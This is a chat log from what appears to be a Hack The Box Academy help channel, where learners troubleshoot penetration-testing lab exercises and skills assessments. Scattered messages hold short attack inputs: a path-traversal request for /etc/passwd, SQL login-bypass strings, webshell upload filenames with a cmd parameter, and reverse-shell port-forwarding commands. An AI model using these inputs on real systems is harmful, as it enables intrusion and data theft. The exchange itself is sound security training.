.

anyone finished or did the latest file inclusion exerise? how to solve it? the LFI dnt work tho

You can DM if you are still stuck on this one.

u solved file inclusion latest lab my man?

The skills assessment? Did this one a while back, so if it's been updated, I have not done the updated version.

DId you see the directory with ls?

what are the new codes for hakcs?

still figuring out and studying the basic codes

Does anyone understand this question? I was doing it on the pawnbox and I get a message saying that it can't resolve. Use cURL from your Pwnbox (not the target machine) to obtain the source code of the "https://www.inlanefreight.com" website and filter all unique paths (https://www.inlanefreight.com/directory" or "/another/directory") of that domain. Submit the number of these paths as the answer.

Exit the SSH session and try to run your command again

Hey guys ! Is there anyone fully understand the content of PendingIntents exploit in Android Dynamic Analysis module? If available hope that i can dm.

I suggest for a much more cleaner approach you should curl for the website normally and save into within a .html file, and then I suggest using grep -oP (only matching and P for reg expressions) then sort those paths with | uniq, if you need me to clarify let me know!

i found the answer to q1, i am struggling on q2 though have run nxc with various search keywords to no avail, i have also manually searched through the shares i gained access to with the domain user from q1, my only assumption based on inference from ||'Users||' is that i am looking for the password to ||'lab_adm||' which i cannot find with any search. can someone give a me a small nudge?

Someone also facing this problem or it just me as I thought HTB community mods would assist me better in this

This machine is being so slow for me since yesterday idk why and keeps getting keep alive error again and again I tried to recompile the ligolo go script with keep alive time=60 etc etc

Im stucked here too...
They updated it recently?

Which one can you name the sub topic?

HTB BB - File Inclusion - Final Skill Assessment

What issue you facing?

I am stuck on the same question. It seems to have no point which is working. I found some extra parameters but nothing works for gods sakes.

I can't find parameter vulnerable to file inclusion...
I have been found one parameter that is reflecting first name from contact form...but I didn't manage to use it for File Inclusion... Also there is an api with few php endpoints, tried to find parameters there but unsuccessfuly..
Lastly, there is one parameter on /api/image.php but it is returning error only

Something wrong with the quiz boxes?

it just doesn't seem to work, at first I had || inlanefreight.htb || in my /etc/hosts it didn't work, then I tried getting rid of it, it didn't work

it's just broken asf

I have the same findings there is also contact.php?region=

For me api/image.php?p=../../is returning 200

@slate zinc can you relay this to any of the staff?

this is broken, same results on the attackbox aswell

I'm here, I will test, one sec

Followed all the commands in the pinned message, but i get this error

aye, thank you

Yeah but it shows that it cannot return :The image ||"http://LINK/api/image.php?p=./.J./etc/passwd"|| cannot be displayed because it contains errors.

solved it, thank you ❤️

Everything is working as intended

We can get that region parameter using some fuzzing and more fuzzing will get us the desired output

huh that is WEIRD

maybe it's just on this one server?

jhaddix the fuzzer! 😄

let me try switching regions

show me /etc/hosts

yeah

Hey man can you please check Attacking Enterprise Network and its sub topic Lateral Movement as my ligolo isn’t working properly and keeps getting me Keepalive and since yesterday that box is being too slow to operate

Even the fuzzing fails to give out something

This is from my kali box

Do you have your VPN connected + PwnBox up?

nope, it's one at a time, and here is the one from my pwnbox

Reset the target and try again

I've been doing that for the past 20 minutes lol, I just switched servers, let me try now

yup, switching servers worked

Thanks @sacred rock , you're the goat

What server were you trying?

US 6

now I'm on US 4, you should checkout 6

It's env the directory not "venv".

how? send dm please

It is working for me on US 6

https://academy.hackthebox.com/module/77/section/854 I am following the "nibble attacking the first box" on my penetration tester learning path. The last part requires me to use msfconsole to hack into the machine with nibble blog file upload vulnerability. It worked for the manual method, but it fails in the metasploit with the error, msf exploit(multi/http/nibbleblog_file_upload) > exploit
[-] Exploit failed: Language option php is not supported. Expected one of [:default, :java, :jsp, :javascript, :python, :powershell]
[*] Exploit completed, but no session was created.

Hi, anyone on Skills Assessment II NoSQL ?

please help me guys

Please elaborate.

Also why i can't chat in #general can anyone tell me ?

I am on the penetration tester learning path

And it's the nibble box.

I have provided the rest of details.

Oh , sorry i don't know much on that but have you tried asking help on the help chatbox on htb site on the bottom right corner ?

That's doesn't help

Its just bogus

Hello

I’m new here

Hey guys, i'm trying to use rsync and crontab to backup a folder to my local machine using the 127.0.0.1 loopback address, how do i do this? I keep getting a cron install error

I created two folders on my desktop:
•Source Folder
•Backup Folder

and a bash script called RSYNC_Backup.sh

#!/bin/bash

rsync -avz -e ssh path/to/source username@127.0.0.1:/path/to/backup

Generated an ssh keypair aswell. But my crontab keeps failing to install which is:

Yooo some active people

***** /home/user/Desktop/RSYNC_Backup.sh

Finally

Wait a bot?

No

Yo guys, if anyone can help me with that please

if igured it out

Yoooo I can send you a server link they can help ig

Wts this server and anyways

Thanks dude

It will be helpful

I need help with the Linux Fundamentals module

👋 Hello

Read and follow #welcome

Hey anyone any luck with Flie inclusion skill assesment

Hi everyone, just logged into my account and I see that a previously completed module has reset itself. What do?

edit: I think it was once called Web Fuzzing with ffuf, or something to that extent. Now its just Web Fuzzing
edit 2: I see a change has been announced in the academy-announcements channel. Anyone with similar issues, look there.

Hi, i'm doing "Model Deployment Tampering" of "Attacking AI - Application and System ", and even following the exact steps showed in the lesson, the mcp target gives me always the same results:

{
  "code": 500,
  "type": "InvalidWorkflowException",
  "message": "Failed to parse yaml."
}

I also don't get how to use reverse shell starting from forwarded ports:

ssh htb-stdnt@<SERVER_IP> -p <PORT> -R 8000:127.0.0.1:8000 -L 8081:127.0.0.1:8081 -N

And finally even the msfconsole exploit fails with:

[*] Started reverse TCP handler on IP:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable. Version 0.8.1 is vulnerable.
[*] Using URL: http://IP:8080/HSyoCR6tWi7JJhR/
[*] Registering the model archive...
[*] Server stopped.
[*] Exploit completed, but no session was created.

Can anyone suggest me how to move ? I think i'm not getting it right.

I want upload.php and thats what I am requesting

i'm stuck con password obtained.... and then the token but the payloads always return the same error

If I can see the shell getting injection in the nginx log but when i am trying to run &cmd=pwd but nothing is getting returned

Hello world

This only works in parrot . Kali has some version issue …

Is anyone able to help me with the Linux Fundamentals module?

Question: Connect to DC01 as Leonvqz and read the flag located at C:\Users\Leonvqz\Desktop\flag.txt

DC01 winrm is filtered is says when running a nmap scan on the ports. Dont know if there is something im missing here, but looking at the answer it doesnt seem so. Can anyone else verify if they are having issues as well?

This is for Windows Remote Management (WinRM) on Windows Lateral Movement

Linux Fundamental on task scheduling moduleThe question ask What is the Type of the service of the "dconf.service".
I did research on the types of services that run on linux.
My conclusion was it is a "User service" but its not the correct answer can anyone assist me.

I am there how can I help maybe i passed on where you need help

I'm on the rsync, crontab and ssh part

Where you make a local folder called to_backup and synced_backup

Nope I have not done that yet can you help me with tasj scheduling question

I just searched google for types

Of services or something, then tried each one

Maybe there is a command for it however

Do u want the answer?

Alright maybe I skipped the answer while googling thanks.

how are u approaching it?

I probably should have looked for a command that tells the type of the service 🤔

Review the content covered just after the RDP example in this paragraph section Lateral Movement From Windows.

got the flag now

oh yes I saw someone posted a command on the forum the command does not reveal anything it just gives an empty output but i did find the answer through googling

forgot i needed to proxy thru the machine and not just be satisfied with a regular tun interface @gray yacht

Yeh systemctl show dconf.service -p Type

Doesn't work for me

hello

https://academy.hackthebox.com/module/216/section/2300
Hello pls actually i'm truggling on 2 questions of my job role path modules concerning Windows Event logs
Could anyone help me pls?

Hello all. I hope you are well. I'm currently doing the Dynamic Port Forwarding with SSH and Socks Tunneling section in the Pivoting, Tunneling, and Port Forwarding module. Its asking me to connect to 172.16.5.19 using Dynamic Port Forwarding... except when I run "proxychains4 nmap -sn -v 172.16.5.0-200", there are some hosts that are up, and some that are down... but the IP Address 172.16.5.19 is showing as down in that list... but thats the ip it wants me to use to rdp. I reset the target 2 times... am I missing something?

No it wasn't. You had contact.php in there.

Hi, I have to contradict you. It ALSO works on KALI!

Hi, asking again if someone solved the file inclusion skill check?

Many people have

best to just ask your question

I don't know if many have solved the latest one

The latest one is not the inlanefreight, it's something different.

Hi all, for the Active Directory Enumeration and Attacks module, Im given a network of 172.16.5.0/23, but im not able to get anything to answer fping or nmap requests in that range. It says all 510 hosts unreachable

Yo

I want to bump this because this is incredibly frustrating almost 2 hours later... I'm not sure what I'm doing wrong.

hi so for the ACL Abuse Tactics section of AD Enumeration and Attacks module, I am following the instructions as specified in the one question of the section but its denying me access when I try to change the password for the user. Can someone help me with this? I would post my output but it would probably spoil stuff.

he guys

Might it be your socks proxychains.conf file? DM me if you would like

Might need to add user to a group before you can change their password

ah ok forgot about that. I will try that

hi I tried that its not letting me do that. its denying me access when I try to add the user.

if anyone sees this later today, let me know if you are available for a DM tonight please. thanks

Hi i need help can me Text somebody

Maybe german

Hey guys quick question about local port forwarding, what is the utility of it I mean if ssh to a compromise host and he is running mysql localy for example, I can access it since i'm on the machine so what is the utility after it to do a local port forwarding on this service?

What if the machine doesn't have mysql client installed, only server?

ow so as i thought it is more to use you own tools on you machine that the host potentially don't have

It is just one example you find many more

Yeah, but the idea is exposing an internal port to outside

That is why is called forwarding, it is not just useful for hacking

okej I get it, it don't have to specially run on localhost right? Like imagine I want to ssh on my internal network from an other country I use then port forwarding from my router?

bumping again... same issues. I'm at wits end if anyone is able to provide any clarity... I've tried so many different random things I saw online to "fix" the issue, and nothing is getting me through.

Hello everyone

@prime mirage

I would like to learn how to hack

I am trying to understand what do you really wanted to say

how do i get into the general chat???

Discord Verification google it is in htb website

Try again I will try to answer

Hahah what I mean is from the example I have here on the module is that we do a localport forwarding from the host (3306 running locally) to our attacking machine. We use ssh for it. So I in my head it was like "okej but if we can ssh to it we can access it internally so what is the purpose of it?" and you awnsered "What if the machine doesn't have mysql client installed, only server?" so I now understand that we do that to use our tools (from our attacker host) on the host we compromised. My next question was "does it have to be a service running on localhost to be able to do local portforwading, or is it the same as doing a localport forwarding from my router (idk port 4444) to my personal pc (22) to be able to connect to my pc (so on my internal network of home) from another place (like another country)?

If you run "ssh -L 1234:localhost:3306 user@ip", you are telling ssh to forward all traffic we send from our machine on port 1234 to 3306 on the remote host. SSH is facilitating the connection. (If im wrong correct me, but I'm on this module atm and this is my understanding, and partly from the reading as well)

Yeah I understand this part but like you can read above, if you can ssh on the machine, why should you do a local port forwarding since you already on the machine so you can access it ^^ but i understand know ty 🙂

i let echoes answer since he started typing. Im 90 percent I know the answer, but I'd rather let him answer so I don't say something incorrectly

This is port binding if I'm not wrong

Module says Local Port Forwarding?

But the concept is the same as what it concerns to the way you're telling the machine to forward or bind the port

Idk I am talking about the concept I didn't do any module

Port binding is forwarding but in your machine you say to send interact to the forwarded port

Kk. Im looking at a module right now, where I got that from. I'm just simply noting that the module was talking about executing a local port forwarding. Based on your responses, sounds like the same thing with different names.

Dang I type bad xd

This was to answer you as what you asked @tender nimbus yes you tell the remote machine to forward the port from outside via ssh

But you can also forward your own port from your machine

Gotcha. That makes sense.

I'm glad I could help

Yeah local port forwarding that's right

So with the above... when I get a response back, is the remote host sending back over port 3306, and then ssh forwarding it back to me on 1234?

Yes

I called it port binding I was wrong it is local port forwarding

But everything else I think is correct

I will check everything tomorrow to be completely sure and if there is something wrong I'll let you know

Hey i figured it out from chatgpt LOL, but given what the answer is i would have never gotten it tbh. When you get to that module just make sure you put spaces between the asterisks when making a crontab

hi im new

Hello, can i dm anyone for a nudge on the new sql injection fundementals skills assesment.

No need to post in every channel..

oh

Hello everyone i'm preparing for an exam and i find that my skills on post-exploitation are weak

Any recommended module in HTB that will make me better?

Windows linux or both?

W gangf

Both but mostly windows

Since the exam will definitely contain an AD Set

For me linux was always easier in terms of privesc and Post-Exploitation but windows has alot of complex stuff that i decided after my exam i will try to learn windows as a OS so i can progress after

I would say

Windows privesc module
Windows lateral movement module
And Attacking and exploiting active directory

Can I hack on a fold

I im kinda new

I got a frend with some scripts. That can disable a computer

Please read the #rules and follow the instructions in #welcome to get access to more channels. This one is dedicated for discussion of the modules on HTB.

Huh

So can I hack on a zfold

Modules wouldn't be a fun experience on a phone

not sure you could run pwnbox via the browser, haven't tried it

IM NEW WHAT IS PWN

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

Go through that

Ok

So I get linux?

This isn't the channel for this kind of discussion, as I said. Follow the instructions in #welcome to link your HTB account to gain access to channels like #general. The link I gave you is how to get started learning.

Hey is there anyone/anyplace i can ask for help on the new skills assessments? I asked in the default channels but nobody answered.

Anyone able to help with nosql injection skills assessment II

This is the channel for module help. Sometimes you just have to be patient or maybe try searching as it's likely someone already asked the question.

Ok

OHHHH IM ON THE WRONG CHANEL

Sorrry

Does skills assessment not count for module?

It won't let me go in general

I already told you a couple times how to get access, please reserve chat here for modules

skill assessment is part of the module

Can anyone give me a hint for the new sql injection skills assessment

Can anyone help me in sql injection for learning

im trying to do the Fingerprinting part of the "information gathering- Web Edition" and its telling me to visit inlanefreight.com or curl using this command curl -s http://app.inlanefreight.local/index.php | grep '<meta name="generator"'
but its not working with either

There are several modules related to SQL injection on Academy

did you add it to your /etc/hosts?

no i forgot to do that

Bro why tf can't I access genral

You have to verify your account, follow the instructions in #welcome

In the Skills Assessment - File Upload Attacks, has anyone done the Extra Exercise? If so, please dm.

Skills Assessment - SQL Injection Fundamentals it's stuffy. I did the old one without any problems, but I couldn't do the new one.

Name of academy

https://academy.hackthebox.com/

lol. bruh you're in the hack the box server. hack the box's academy.

Have you done the new Skills Assessment - File Inclusion?

hey everyone, I need a hand with nmap, specifically the service enumeration flag section. I'm not sure how I'm supposed to find which port to Netcat into, and I know darn well that there's gotta be a faster way to find the right port without sifting through a -p- nmap

I ran the scan with -p- & -sV and found the flag on one of the ports. Didn't even need to use nc.

Hi, I am really struggling with the Skills Assessment - File Inclusion assestment. I am basically totally lost at this moment, there is anyone that can help me?

Thank you so much dude! I did this first bruh

sudo nmap 10.129.2.49 -p- -sV -Pn -n --disable-arp-ping --packet-trace

no where near correct lol

Hi Epic, you can omit the packet-trace as it isn't necessary in 95% of the nmap scans you use.

cleans up the output a bit 🙂

Noted 🤙

Hi guys

Hi Guys, need help with Attacking Domain Trusts - Cross-Forest Trust Abuse - from Windows under Active directory enumeration and attack module

Within this section, I am on the Accessing DC03 Using Enter-PSSession subsection.

I don't know how to proceed with this subsection. I don't have the built-in administrator account's password and i was unable to crack it after performing DCSync. Any clue to help.

Below text is from HTB: I am not able to reproduce it

PS C:\htb> Enter-PSSession -ComputerName ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL -Credential INLANEFREIGHT\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> whoami
inlanefreight\administrator

[ACADEMY-EA-DC03.FREIGHTLOGISTICS.LOCAL]: PS C:\Users\administrator.INLANEFREIGHT\Documents> ipconfig /all

Windows IP Configuration

Host Name . . . . . . . . . . . . : ACADEMY-EA-DC03
Primary Dns Suffix . . . . . . . : FREIGHTLOGISTICS.LOCAL
Node Type . . . . . . . . . . . . : Hybrid
IP Routing Enabled. . . . . . . . : No
WINS Proxy Enabled. . . . . . . . : No
DNS Suffix Search List. . . . . . : FREIGHTLOGISTICS.LOCAL

I don't think you are required to reproduce it.

„Can someone please help me? I'm stuck on the SQL Injection Fundamentals Skills Assessment — nothing seems to work, and I've already tried everything.”

I'm still at the login page.

Test every parameter, start basic, look for different responses.

Thanks for the reply! I’m still stuck though. I’ve tried the basic payloads like ' OR 1=1-- and admin'--, but I can’t seem to bypass the login. I’m not sure if I should be focusing on UNION injections or something else at this point. Any hints on how to proceed at the login page?

Make use of the cheat sheet provided in the module.

Is the pawnbox not the one on the right side?

It's new so I don't have any idea what changed, but UNION select attacks are always the way to go I think.

Just keep adding the number of cols until you get a response

hello, i am doing hackthebox academy File upload attack module and i am stuck on whitelist filters, can anyone give tips, i found that filename="shell.php..jpg" and shell.php/.jpg is getting uploaded but i cannot even view the web page nor the execute code, please help me i have been stuck for 2 hours on this

what for @verbal finch

this is not a server with hackers for hire

if you lost your Google account, this isn't Google

Uhh

what questions do you need answered?

They lost their Google account. This is not Google support

ive used the cheatsheet, tons of other payloads and sqlmap too, nothing seems to be working, what might i be doing wrong

You are clearly missing something, test all parameters, hack with a goal

can anyone give me tip? i found upload vuln but php code does not execute what should i try

can anyone recommend me course for python scripting , automating or for ctfs ? i am done with basic python .

u guys how do i fix my lab tho?
Like most of my labs now become 403 error when i access the webpage , da hell?

Are you connected with VPN?

Hi everyone, i hope you are having a good day/afternoon. I'm doing the sqli new skill assessment from CWES path, the chattr one. I need some help please!!! T_T

i use the box they gavie

the instance.

Try resetting it I would say, usually fixes about 95% of issues

nah same thing , dif regions too , funny

hold on let me try , ithink just now cause it requires 5 mins waiting time i forgot about it

It is recommended to wait a few mins, usually not required as far as I'm aware

really huh ,i just reset , samet thing , let me reset the lab instance too

i will wait a while

anymore solutions? i still can't access

Hey guys, im stuck in lfi skill assessment part i cant get rce actually. There is file upload part and i tried to upload a php shell into it but ended up just seeing that php code in response when i was requesting the php file with &cmd=id query parameter. If anyone has completed or could give some hints i would be grateful

What are you trying to access exactly?

the webpge , sqli skill asses module , it shows me 404 not found or smtg

Try https instead of http

it worked but why tho? it should redirect https itself no?

Some guid me

The server is only listening on port 443, port 80 may not be configured at all. Redirects have to be explicitly configured, which are not. If you actually read the skills assessment text, it speaks about intercepting https.

I am stuck on the second question in the password attacks 'Pass the Certificate' section. I've entered DC01 using pywhisker, found the administrator password, and can connect to CA01 as admin, but there is no flag on the CA01 admin’s desktop. It seems I need to get admin permissions for DC01. How can I achieve this?

Anyone here I can ask for attacking ai - application and system skill assessment?

same

anyone wana give a nudge on the sqli new assessment?

i am halfway tho like i assume is broken or smtg lol?

Were you able to get past the login page?

is academy having technical difficulties atm

https://status.hackthebox.com/

this lab is very strange like i cant execute literally anything not even log poisoning allow_url_include is also disabled and no rfi chance i guess because of this

Module 25, Section 142 (Kerberos attacks - Unconstrained Delegation), I cannot connect via RDP. Seems to be some sort of legacy RDP on the system.

Has anyone succeeded?

I tried playing around with the /sec flags.

You might need to use a non-default port for your RDP connection. I'd double check the lab connection instructions.

I already am using the non default port.

You can DM if you'd like to show me what it looks like on your end.

in the courses for certifications the modules also include labs right? Not just theory

meaning, practice + theory

In Password Attacks - Skill Assessment (New), I logged in to ssh, configued chisel and got william pass, can anyone give me a hint to what to do next? I'm struck..

Hey friends

Can somebody explain to me why the reverse tcp connection starts then suddenly closes?

(I used a base64 encoded payaload on target script and nc on myhost)

I'm back

yes

Hello I'm stuck in the skill assessment on the Information Gathering - Web Edition can you help me

ur in it

just press enter on your keyboard or type something and press enter and see if something pops up

in which lab?

oh it closes? hmmmmmmmmm send me dms let's debug it together

the last one

The nc closed right after that

go dms

Okay thanks

that lab is annoying though, where you got struck or what hint you need?

when I try anithing on the vhost I have errors while I'm connected to the vpn ( gobuster ..)

Updated /etc/hosts?

yes also

I curled and it's working

then try taking Pwnbox

I'm stuck at this one : || What is the API key in the hidden admin directory that you have discovered on the target system?||

You need to find vhost first

yo, im stuck at linux priv esc module, 1st challenge environment enumeration

ok I will try thanks

Hi all

I find thanks you

No problem

after that you crwling with what ? scrapy

Not yet though

You won't get anything

Do it again

am I close ?

Use gobuster on the vhost you found

I alredy did it and find the admin thing

ok thank you for the hint you can delete

@sleek spruce I finish it thank you bro

Thanks , got it.

I'm asking regarding SQL Injection Fundamentals - Skills Assessment I managed to login but I'm really stuck on further enumeration, cannot get column number.

Hi again. Anybody help please

No problem

What is the name of the hidden "history" file in the htb-user's home directory? ( What is the answer here? )

If anyone wants to help me with the flag in the proxy module for the bug bounty hunter path, i would greatly appreciate it. i already got the cookie from the site once, using the fuzzing, but then the flag is a little tricky and wants you to fuzz for users with matching md5 cookie? just a little confused.

You can google this easily

for attacking and enumerating AD, for the bleeding edge vulnerabilities, how are you suppose to get the nopac.py file to run on your attack box? the attack box cant clone the repos and pulling all the files from your host box to the vm is just annoying AF

Hey did you resolve this? I’m having the same problem

Hello all - Question on the network foundations module - Skills Assessment

Can someone explained me why this happens?

when connected throught virtual machine i see :
´´´ Active Internet connections (only servers)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
udp 0 0 0.0.0.0:41687 0.0.0.0:* -

and in Parrot Terminal I see (which is ok):

Proto Recv-Q Send-Q Local Address Foreign Address State
PID/Program name
tcp 0 0 htb-a6urfndgqv.htb:http 0.0.0.0:* LISTEN
tcp 0 0 localhost:ipp 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:ssh 0.0.0.0:* LISTEN
tcp 0 0 0.0.0.0:sunrpc 0.0.0.0:* LISTEN
tcp 0 0 localhost:5901 0.0.0.0:* LISTEN
2316/Xtigervnc
udp 0 0 0.0.0.0:bootpc 0.0.0.0:*
udp 0 0 0.0.0.0:sunrpc 0.0.0.0:*

Hi All, I am trying to finish the "Skills Assessment - WordPress" located here https://academy.hackthebox.com/module/17/section/64

I cannot figure out the task "Use a vulnerable plugin to download a file containing a flag value via an unauthenticated file download. "

I believe that CVE 2019-19985 https://www.exploit-db.com/exploits/48698 for the Email Subscribers plugin is the correct one.

Assuming that is the correct CVE, I cannot figure out how to use it to get the flag for the task. I've tried various URLs such as "curl http://blog.inlanefreight.local/wp-content/plugins/email-subscribers/flag.txt" but it just says it doesn't exist.

Spent a lot of time Googling but this is as far as I got. Any help is appreciated.

Hello All, I cannot RDP into the machine in Active Directory Trust Attacks -> Abusing SQL Server Links Module. What can i do?

try with sudo too

Hi everyone,
I'm kinda stuck with the Web Fuzzing - skill assessment since it been changed.
I try all I learned in the module but cannot figure what is the problem.
If anyone who solved this can help, I'll appreciated it.

||/spoiler Hello guys quick question about sock tunneling, I did all the things that the module sais and it works perfectly, i'm just curious about one thing, after doing a dynamic port forwarding on port 1234 and adding a sock4 127.0.0.1 1234 to my /etc/proxychains.config file, when I start an nmap on the target with proxychain it give me no open ports, not even the rdp one it says "filtered" but i can connect to it with proxychains any idea?||

I am having some trouble with the password attacks module, I'm not sure if the right file I need is included in the virutal environment. Would anyone be able to help with this?

Is there not the file in the resources of the module?

Where would I be able to see the resources for the module? I assumed it was included in the virtual environment

Not sure if this is the right module, or if it's applicable to the one you're working on, but some modules have additional resources (files) available to download outside of the virtual environment. They'll be next to the Cheat Sheet if they exist.

This is the introduction to John the Ripper, it asks me to crack user r0lf's password but I can't seem to find any password file or link to download resources on that section.

there's r0lf's hash in the section

Got it, thanks!

Just for fun, I decided to revisit the Intro to Windows Evasion Techniques module and see what would happen if I rewrote the example C# reverse shell from that module in Rust.

Turns out, it works even better — and is MUCH easier to cross-compile.

Hello everyone, I need some help with the File Inclusion Skills Assessment module. My basic idea for getting the flag in the root is as follows: the website has an upload form for applications. You can upload a webshell there. On the contact.php page, I found a hidden parameter called ?region=. This is probably used for LFI. The problem is that if the string (whether plain text or URL encoded) contains dots (.) or slashes (/), you get an error message: “region” parameter contains invalid characters. Does anyone have any idea how I can get around using dots and slashes?

Hello, I'm in Password Attacks - Pass the Certificate. I run ntlmrelayx, and it listens. I then run printerbug.py, but I get no output at all. It just drops back to the prompt. I have tried running it with --verbose, but I get nothing. Any idea what's happening here?

Why not

Nothing impossible

Not really; it does teach you a lot of C# concepts, so if you're a fast learner like me, you can pick up those skills on the fly; no prior experience with C# necessary. However, translating the payloads into other programming languages after the fact is always fun regardless.

I've heard from other people that they tried in another language and it didn't work so they had to do it in C#.

I bet a thousand dollars

Mil

Dollar

Yes make

Anyone able to help with nosql injection skills assessment II?

Hey, I need a help in Exploiting Web Vulnerabilities in Thick-Client Applications section in Attacking Common Applications module.

I don't know how to solve it

Currently doing Intro to SCCM, anyone have advice for the last question, seems 2 accounts are domain accounts but one you get a ||local admin password not domain||, and the other 2 accounts don't have access to DC

Spent 3 days trying to upload or execute in memory for the sccm skill assessment 3rd question. But always gets a connection related error during transfer. Am I going down a rabbit hole?

hey guys when trying to use ligolo to route my targets traffic to my new interface i be getting " Starting tunnel to root@dmz01 (00505694f875)
error: unable to start tunnel: unable to open tun interface 'causalargent' (tun.New device or resource busy)
"

Heyyy supposed I want to start...
I need an organized path .... Sequential I mean...
Can someone assist me

Get Started with the HTB Beginners Bible: https://www.hackthebox.com/blog/learn-to-hack-beginners-bible

@plush flint

Thank you I already did ..that and ... funny now idk what move to take... There are alot I don't know what comes first what follows too

you could do the #cjca

https://academy.hackthebox.com/exams/7/

Running lingo with sudo on kali? That should fix the issue

anyone solvd SQLI latest skill assessment? hit me up for real

I'm stuck on Skills Assessment - File Inclusion. Scenario:<sumace/>. I think the vulnerability is in thanks.php?n, and on the Apply page, I've uploaded a shell.docx zip file, but I don't understand where it's stored or how to interact with thanks.php?n. Everything I write just displays as text, and I've tried various methods, including creating a server using python3 and applying php filters, but nothing seems to work. Please help me.
https://academy.hackthebox.com/module/23/section/513

Hi!
I've received error in this module https://academy.hackthebox.com/module/227/section/2500

Noriben finished job with error. I tried to relunch VM and it didnt help...

Can't insert the screenshot here, error while I tried to terminate Noriben by CTRL+C and error about ProcMon popped up "Unable to open 'Noriben_02_Oct....' for reading"

password attack , skill assessment ..

im trying to upload mimikatz.exe to Dc01 so i can access the administrators hash , but i keep running into this error , am i doing anything wrong ?

I am at the very same place right now. Let me check it out

Can I DM you? I had another idea, but don't want to give too much away.

k

Hello, i'm doing the Attacking GraphQL Skills Assessment and i'm a little bit stuck, i have gather all the information and tried SQli without success
If someone can help me pls

Thats wrong endpoint for file inclusion look for image.php in web application and you will get the lfi but from there im stuck also i cant get rce

What all have u tried?

i did Introspection Queries and collect every data like employees or api keys and tried SQL injection

gather what all queries you can run, ull need an api key to run that, that's where u get the sqli

ok i see thx

Right, but you can pick up on the C# that the module teaches very quickly — or at least I was able to; don't know about any others.

Anyone who was able to get RCE on the updated File Inclusion - Skills Assessment please dm me. Thanks a lot!

Are you still stuck on this question?

You can DM what you know and what you are trying.

Hello guys.
I’m learning Android hacking with Hack The Box Module “Android Application Dynamic Analysis”.

I’m getting errors when I want to resolve the task of “Hooking Java Methods”. Frida always says on my laptop : “Failed to spawn: agent connection closed unexpectedly”.

Please, can someone help ???

I’m using Macbook M1 and I use the process in the module.

Thanks in advance.

I try to use Pixel 6a as AVD it seems like it working but, in real, I can't have the answer.

The error in my terminal after some seconds is : "Failed to spawn: timeout was reached "

Interesting. The application uploads surely end up in the directory “http://IP:PORT/uploads”. Have you tried accessing elements in it yet? According to ffuf, /uploads definitely exists (Http response code: 301). the parameter for image.php is "?p=" right?

Hi, in the "Hunting Evil with Sigma (Splunk Edition)" module, i'm unable to rdp to the host, the Splunk webserver on the server works but not the rdp part of it (and i cant have two servers online at the same time)

is there another solution ?

✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅
I DID IT.

I USE PIXEL 6 AND THE LATEST VERSION OF FRIDA : VERSION 17.3.1
✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅ ✅

The sigma rules and config files are hosted on the previous section's target. One approach would be work on the problem sequentially, copying the results on the previous target, pasting into your note-taking app of choice, then copy-pasting into the new target's splunk instance.

A more general tip (not necessarily what I would do in this case) is that you can transfer files to and from Pwnbox, which persists across sections.

hey, I need a help ,I'm stuck all the day in "Exploiting Web Vulnerabilities in Thick-Client Applications" section in "Attacking Common Applications " module. can you give me the response because I don't know how to find it even I do all steps.

Chat gpt know this server

He made me join him

Just jocking

Yeah unfortunately

@humble ginkgo Hi, welcome. Please read the #rules and follow the instructions in #welcome to get access to other channels for general discussion. This channel is dedicated for chat about the modules on Academy.

hey I'm stuck with the last question of this module when I use metasploit I get a hash but no cleartext :
https://academy.hackthebox.com/module/112/section/1245

Did you try to crack it?

the hash yeah

You can DM with what you know and are trying.

not sure if the type was right tho

hashid wasn't giving me anything

I was using RAKP for the hash type but john wasn't giving me anything

Introduction to Windows Evasion Techniques
Page 3
Static Analysis

I can't log into the box — why does it say the password is incorrect?

xfreerdp /v:10.129.217.111 /u:Administrator /p:'Eva$i0n!' /dynamic-resolution /drive:SharedDrive,.
[10:27:31:938] [32629:32630] [WARN][com.freerdp.crypto] - Certificate verification failure 'self-signed certificate (18)' at stack position 0
[10:27:31:938] [32629:32630] [WARN][com.freerdp.crypto] - CN = EVASION-TARGET
[10:27:32:139] [32629:32630] [WARN][com.freerdp.core.nla] - SPNEGO received NTSTATUS: STATUS_LOGON_FAILURE [0xC000006D] from server
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core] - nla_recv_pdu:freerdp_set_last_error_ex ERRCONNECT_LOGON_FAILURE [0x00020014]
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core.rdp] - rdp_recv_callback: CONNECTION_STATE_NLA - nla_recv_pdu() fail
[10:27:32:139] [32629:32630] [ERROR][com.freerdp.core.transport] - transport_check_fds: transport->ReceiveCallback() - -1

Module: Wi-Fi Penetration Testing Basics
Section: Wi-Fi Penetration Testing Basics - Skills Assessment
Question: What is the password for the WiFi network with the BSSID D8:D6:3D:EB:29:D5?

As shown in the module, I am using the following command to capture the four-way handshake.

sudo airodump-ng wlan0mon -w HTB -c 1

But when I use aircrack-ng to crack the password with a wordlist, I get the followign error message:

Packets contained no EAPOL data; unable to process this AP.

I've deauthed the connected client so that it would attempt to reconnect and I've let airodump-ng run for over 10 minutes. Does anyone know why the client is not doing the handshake?

"I can't connect to EVASION-DEV even though I'm using the correct credentials.
Introduction to Windows Evasion Techniques"

The lab VMs work a little different in this module compared to most. Those credentials are for the EVASION-DEV machine which you spawn from the Introduction section (page 1). The DEV machine doesn't stay active, simultaneously with the targets you spawn on other pages/sections.

Personally, I found it more convenient to set up my own dev environment on my own local machine and use the VPN option to connect to the lab for this module. You could feasibly switch back and forth between the sections though, if you're not as error-prone as I was!

Do you mean I should connect to the machine in section 1 and then not shut it down?

I just spun it up and am having no issues using the provided credentials.

Can you send the code exactly as it is, I’ll just change the IP.

You can DM, it's really no different than the example provided, but I also ignore the cert.

Having a problem with Windows Attack and Defense -Kerberoasting kali ssh instructions.
The Overview and Lab Environment section gives an ip or (depending on the section) but no kali information on the question. Can't get any of the ips to work.

Isn't that the target you spawn?

The target is WS01 windows server

Anyone willing to help trying to crack a RIPEMD-128 hash? It won't work for me, I don't think I am doing anything wrong am I?

Did you already crack it?

